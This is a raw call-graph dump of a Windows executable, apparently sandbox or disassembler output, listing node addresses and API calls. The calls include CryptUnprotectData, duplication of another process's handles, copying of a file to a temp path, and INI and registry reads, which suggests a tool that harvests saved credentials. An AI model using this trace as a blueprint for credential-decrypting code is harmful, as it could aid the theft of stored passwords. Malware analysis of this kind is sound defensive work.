38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 free 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab free free 38880->38932 38881->38880 38883 40b633 free 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX free 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 free 38923->38925 38926 40aa04 free 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab free free 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 free 39322->39323 39324 40cf14 39323->39324 39350 40b1ab free free 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 free 39331->39332 39333 40cc15 39332->39333 39334 40aa04 free 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab free free 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 free 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy free free 39377->39399 39379 40cedd 39380 40aa04 free 39379->39380 39381 40cee5 39380->39381 39382 40aa04 free 39381->39382 39383 40ceed 39382->39383 39384 40aa04 free 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy free free 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39467 415378 memcpy memcpy 39402->39467 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39470 4446ea 11 API calls 39424->39470 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 39429 432d4e 3 API calls 39431 4443ec 39429->39431 39468 416935 16 API calls 39430->39468 39433 444381 39431->39433 39469 416935 16 API calls 39431->39469 39433->39245 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39471 432cc4 memset memset memcpy 39437->39471 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39472 41b7d9 39445->39472 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39490 41b321 100 API calls 39449->39490 39486 41519d 39450->39486 39453->39449 39489 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39489 39455->39256 39456->39273 39457->39273 39458->39260 39459->39263 39460->39265 39461->39267 39462->39269 39463->39271 39464->39273 39465->39235 39466->39231 39468->39433 39469->39433 39470->39433 39471->39439 39478 41b812 39472->39478 39473 415a6d memset 39474 41b8c2 39473->39474 39475 41b980 39474->39475 39476 41b902 memcpy memcpy memcpy memcpy memcpy 39474->39476 39481 41b849 39474->39481 39483 41b9ad 39475->39483 39492 4151e3 39475->39492 39476->39475 39478->39481 39485 41b884 39478->39485 39491 444706 11 API calls 39478->39491 39480 41ba12 39480->39481 39482 41ba32 memset 39480->39482 39481->39447 39482->39481 39483->39481 39495 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39483->39495 39485->39473 39485->39481 39496 4175ed 39486->39496 39489->39449 39490->39455 39491->39485 39494 41837f 54 API calls 39492->39494 39493 4151f9 39493->39483 39494->39493 39495->39480 39497 417570 SetFilePointer GetLastError GetLastError 39496->39497 39498 4175ff 39497->39498 39499 41760a ReadFile 39498->39499 39500 4151b3 39498->39500 39501 417637 39499->39501 39502 417627 GetLastError 39499->39502 39500->39453 39501->39500 39503 41763e memset 39501->39503 39502->39500 39503->39500 39516 41703f 39504->39516 39506 43847a 39507 43848a 39506->39507 39508 43847e 39506->39508 39523 438270 39507->39523 39553 4446ea 11 API calls 39508->39553 39513 4384bb 39514 438270 133 API calls 39513->39514 39515 438488 39514->39515 39515->39276 39517 417044 39516->39517 39518 41705c 39516->39518 39522 417055 39517->39522 39555 416760 11 API calls 39517->39555 39519 417075 39518->39519 39556 41707a 11 API calls 39518->39556 39519->39506 39522->39506 39557 415a91 39523->39557 39525 43828d 39526 438297 39525->39526 39527 438341 39525->39527 39529 4382d6 39525->39529 39600 415c7d 16 API calls 39526->39600 39561 44358f 39527->39561 39532 4382fb 39529->39532 39533 4382db 39529->39533 39531 438458 39531->39515 39554 424f26 122 API calls 39531->39554 39594 415c23 memcpy 39532->39594 39592 416935 16 API calls 39533->39592 39536 4382e9 39593 415c7d 16 API calls 39536->39593 39537 438305 39540 44358f 19 API calls 39537->39540 39542 438318 39537->39542 39539 438373 39546 438383 39539->39546 39595 4300e8 memset memset memcpy 39539->39595 39540->39542 39542->39539 39587 43819e 39542->39587 39544 4383f5 39549 438404 39544->39549 39550 43841c 39544->39550 39545 4383cd 39545->39544 39597 42453e 122 API calls 39545->39597 39546->39545 39596 415c23 memcpy 39546->39596 39598 416935 16 API calls 39549->39598 39599 416935 16 API calls 39550->39599 39553->39515 39554->39513 39555->39522 39556->39517 39558 415a9d 39557->39558 39559 415ab3 39558->39559 39560 415aa4 memset 39558->39560 39559->39525 39560->39559 39562 4435be 39561->39562 39563 443676 39562->39563 39566 4436ce 39562->39566 39569 442ff8 19 API calls 39562->39569 39571 44366c 39562->39571 39585 44360c 39562->39585 39564 443737 39563->39564 39567 442ff8 19 API calls 39563->39567 39570 443758 39563->39570 39568 442ff8 19 API calls 39564->39568 39565 441409 memset 39565->39570 39573 4165ff 11 API calls 39566->39573 39567->39564 39568->39570 39569->39562 39570->39565 39575 443775 39570->39575 39574 4169a7 11 API calls 39571->39574 39572 4437be 39576 416760 11 API calls 39572->39576 39577 4437de 39572->39577 39573->39563 39574->39563 39575->39572 39581 415c56 11 API calls 39575->39581 39576->39577 39578 42463b memset memcpy 39577->39578 39580 443801 39577->39580 39578->39580 39579 443826 39583 43bd08 memset 39579->39583 39580->39579 39582 43024d memset 39580->39582 39581->39572 39582->39579 39584 443837 39583->39584 39584->39585 39586 43024d memset 39584->39586 39585->39542 39586->39584 39588 438246 39587->39588 39590 4381ba 39587->39590 39588->39539 39589 41f432 109 API calls 39589->39590 39590->39588 39590->39589 39591 41f638 103 API calls 39590->39591 39591->39590 39592->39536 39593->39526 39594->39537 39595->39546 39596->39545 39597->39544 39598->39526 39599->39526 39600->39531 39601->39282 39602->39286 39604 425108 39603->39604 39610 42510d 39603->39610 39648 424f74 123 API calls 39604->39648 39607 42516e 39649 415c7d 16 API calls 39607->39649 39608 425115 39608->39288 39610->39608 39616 42569b 39610->39616 39611->39288 39612->39288 39613->39296 39614->39295 39615->39286 39627 4256f1 39616->39627 39644 4259c2 39616->39644 39621 4260dd 39661 424251 119 API calls 39621->39661 39622 429a4d 39629 429a66 39622->39629 39630 429a9b 39622->39630 39626 422aeb memset memcpy memcpy 39626->39627 39627->39622 39627->39626 39632 4260a1 39627->39632 39641 4259da 39627->39641 39642 429ac1 39627->39642 39627->39644 39647 425a38 39627->39647 39650 4227f0 memset memcpy 39627->39650 39651 422b84 15 API calls 39627->39651 39652 422b5d memset memcpy memcpy 39627->39652 39653 422640 13 API calls 39627->39653 39655 4241fc 11 API calls 39627->39655 39656 42413a 89 API calls 39627->39656 39662 415c56 11 API calls 39629->39662 39631 429a96 39630->39631 39664 416760 11 API calls 39630->39664 39665 424251 119 API calls 39631->39665 39659 415c56 11 API calls 39632->39659 39634 429a7a 39663 416760 11 API calls 39634->39663 39660 416760 11 API calls 39641->39660 39643 425ad6 39642->39643 39666 415c56 11 API calls 39642->39666 39643->39607 39644->39643 39654 415c56 11 API calls 39644->39654 39647->39644 39657 422640 13 API calls 39647->39657 39658 4226e0 12 API calls 39647->39658 39648->39610 39649->39608 39650->39627 39651->39627 39652->39627 39653->39627 39654->39641 39655->39627 39656->39627 39657->39647 39658->39647 39659->39641 39660->39621 39661->39643 39662->39634 39663->39631 39664->39631 39665->39642 39666->39641 39667->38759 39668->38767 39669 44dea5 39670 44deb5 FreeLibrary 39669->39670 39671 44dec3 39669->39671 39670->39671 39672 4147f3 39675 414561 39672->39675 39674 414813 39676 41456d 39675->39676 39677 41457f GetPrivateProfileIntW 39675->39677 39680 4143f1 memset _itow WritePrivateProfileStringW 39676->39680 39677->39674 39679 41457a 39679->39674 39680->39679 39681 44def7 39682 44df07 39681->39682 39683 44df00 ??3@YAXPAX 39681->39683 39684 44df17 39682->39684 39685 44df10 ??3@YAXPAX 39682->39685 39683->39682 39686 44df27 39684->39686 39687 44df20 ??3@YAXPAX 39684->39687 39685->39684 39688 44df37 39686->39688 39689 44df30 ??3@YAXPAX 39686->39689 39687->39686 39689->39688 39690 4287c1 39691 4287d2 39690->39691 39692 429ac1 39690->39692 39693 428818 39691->39693 39694 42881f 39691->39694 39709 425711 39691->39709 39704 425ad6 39692->39704 39760 415c56 11 API calls 39692->39760 39727 42013a 39693->39727 39755 420244 96 API calls 39694->39755 39698 4260dd 39754 424251 119 API calls 39698->39754 39702 4259da 39753 416760 11 API calls 39702->39753 39705 429a4d 39711 429a66 39705->39711 39712 429a9b 39705->39712 39708 422aeb memset memcpy memcpy 39708->39709 39709->39692 39709->39702 39709->39705 39709->39708 39714 4260a1 39709->39714 39723 4259c2 39709->39723 39726 425a38 39709->39726 39743 4227f0 memset memcpy 39709->39743 39744 422b84 15 API calls 39709->39744 39745 422b5d memset memcpy memcpy 39709->39745 39746 422640 13 API calls 39709->39746 39748 4241fc 11 API calls 39709->39748 39749 42413a 89 API calls 39709->39749 39756 415c56 11 API calls 39711->39756 39713 429a96 39712->39713 39758 416760 11 API calls 39712->39758 39759 424251 119 API calls 39713->39759 39752 415c56 11 API calls 39714->39752 39716 429a7a 39757 416760 11 API calls 39716->39757 39723->39704 39747 415c56 11 API calls 39723->39747 39726->39723 39750 422640 13 API calls 39726->39750 39751 4226e0 12 API calls 39726->39751 39728 42014c 39727->39728 39731 420151 39727->39731 39770 41e466 96 API calls 39728->39770 39730 420162 39730->39709 39731->39730 39732 4201b3 39731->39732 39733 420229 39731->39733 39734 4201b8 39732->39734 39735 4201dc 39732->39735 39733->39730 39736 41fd5e 85 API calls 39733->39736 39761 41fbdb 39734->39761 39735->39730 39740 4201ff 39735->39740 39767 41fc4c 39735->39767 39736->39730 39740->39730 39742 42013a 96 API calls 39740->39742 39742->39730 39743->39709 39744->39709 39745->39709 39746->39709 39747->39702 39748->39709 39749->39709 39750->39726 39751->39726 39752->39702 39753->39698 39754->39704 39755->39709 39756->39716 39757->39713 39758->39713 39759->39692 39760->39702 39762 41fbf8 39761->39762 39765 41fbf1 39761->39765 39775 41ee26 39762->39775 39766 41fc39 39765->39766 39785 4446ce 11 API calls 39765->39785 39766->39730 39771 41fd5e 39766->39771 39768 41ee6b 85 API calls 39767->39768 39769 41fc5d 39768->39769 39769->39735 39770->39731 39773 41fd65 39771->39773 39772 41fdab 39772->39730 39773->39772 39774 41fbdb 85 API calls 39773->39774 39774->39773 39776 41ee41 39775->39776 39777 41ee32 39775->39777 39786 41edad 39776->39786 39789 4446ce 11 API calls 39777->39789 39780 41ee3c 39780->39765 39783 41ee58 39783->39780 39791 41ee6b 39783->39791 39785->39766 39795 41be52 39786->39795 39789->39780 39790 41eb85 11 API calls 39790->39783 39792 41ee70 39791->39792 39793 41ee78 39791->39793 39833 41bf99 85 API calls 39792->39833 39793->39780 39796 41be6f 39795->39796 39797 41be5f 39795->39797 39802 41be8c 39796->39802 39827 418c63 memset memset 39796->39827 39826 4446ce 11 API calls 39797->39826 39799 41be69 39799->39780 39799->39790 39802->39799 39803 41bf3a 39802->39803 39804 41bed1 39802->39804 39807 41bee7 39802->39807 39830 4446ce 11 API calls 39803->39830 39806 41bef0 39804->39806 39809 41bee2 39804->39809 39806->39807 39808 41bf01 39806->39808 39807->39799 39831 41a453 85 API calls 39807->39831 39810 41bf24 memset 39808->39810 39812 41bf14 39808->39812 39828 418a6d memset memcpy memset 39808->39828 39816 41ac13 39809->39816 39810->39799 39829 41a223 memset memcpy memset 39812->39829 39815 41bf20 39815->39810 39817 41ac52 39816->39817 39818 41ac3f memset 39816->39818 39821 41ac6a 39817->39821 39832 41dc14 19 API calls 39817->39832 39819 41acd9 39818->39819 39819->39807 39822 41519d 6 API calls 39821->39822 39823 41aca1 39821->39823 39822->39823 39823->39819 39824 41acc0 memset 39823->39824 39825 41accd memcpy 39823->39825 39824->39819 39825->39819 39826->39799 39827->39802 39828->39812 39829->39815 39830->39807 39832->39821 39833->39793 39834 417bc5 39836 417c61 39834->39836 39839 417bda 39834->39839 39835 417bf6 UnmapViewOfFile CloseHandle 39835->39835 39835->39839 39838 417c2c 39838->39839 39846 41851e 18 API calls 39838->39846 39839->39835 39839->39836 39839->39838 39841 4175b7 39839->39841 39842 4175d6 CloseHandle 39841->39842 39843 4175c8 39842->39843 39844 4175df 39842->39844 39843->39844 39845 4175ce Sleep 39843->39845 39844->39839 39845->39842 39846->39838 39847 4148b6 FindResourceW 39848 4148cf SizeofResource 39847->39848 39851 4148f9 39847->39851 39849 4148e0 LoadResource 39848->39849 39848->39851 39850 4148ee LockResource 39849->39850 39849->39851 39850->39851 39852 441b3f 39862 43a9f6 39852->39862 39854 441b61 40035 4386af memset 39854->40035 39856 44189a 39857 4418e2 39856->39857 39859 442bd4 39856->39859 39858 4418ea 39857->39858 40036 4414a9 12 API calls 39857->40036 39859->39858 40037 441409 memset 39859->40037 39863 43aa20 39862->39863 39870 43aadf 39862->39870 39864 43aa34 memset 39863->39864 39863->39870 39865 43aa56 39864->39865 39866 43aa4d 39864->39866 40038 43a6e7 39865->40038 40046 42c02e memset 39866->40046 39870->39854 39872 43aad3 40048 4169a7 11 API calls 39872->40048 39873 43aaae 39873->39870 39873->39872 39888 43aae5 39873->39888 39874 43ac18 39877 43ac47 39874->39877 40050 42bbd5 memcpy memcpy memcpy memset memcpy 39874->40050 39878 43aca8 39877->39878 40051 438eed 16 API calls 39877->40051 39882 43acd5 39878->39882 40053 4233ae 11 API calls 39878->40053 39881 43ac87 40052 4233c5 16 API calls 39881->40052 40054 423426 11 API calls 39882->40054 39886 43ace1 40055 439811 162 API calls 39886->40055 39887 43a9f6 160 API calls 39887->39888 39888->39870 39888->39874 39888->39887 40049 439bbb 22 API calls 39888->40049 39890 43acfd 39895 43ad2c 39890->39895 40056 438eed 16 API calls 39890->40056 39892 43ad19 40057 4233c5 16 API calls 39892->40057 39894 43ad58 40058 44081d 162 API calls 39894->40058 39895->39894 39898 43add9 39895->39898 39898->39898 40062 423426 11 API calls 39898->40062 39899 43ae3a memset 39900 43ae73 39899->39900 40063 42e1c0 146 API calls 39900->40063 39901 43adab 40060 438c4e 162 API calls 39901->40060 39902 43ad6c 39902->39870 39902->39901 40059 42370b memset memcpy memset 39902->40059 39906 43adcc 40061 440f84 12 API calls 39906->40061 39907 43ae96 40064 42e1c0 146 API calls 39907->40064 39910 43aea8 39913 43aec1 39910->39913 40065 42e199 146 API calls 39910->40065 39912 43af00 39912->39870 39917 43af1a 39912->39917 39918 43b3d9 39912->39918 39913->39912 40066 42e1c0 146 API calls 39913->40066 39914 43add4 39919 43b60f 39914->39919 40125 438f86 16 API calls 39914->40125 40067 438eed 16 API calls 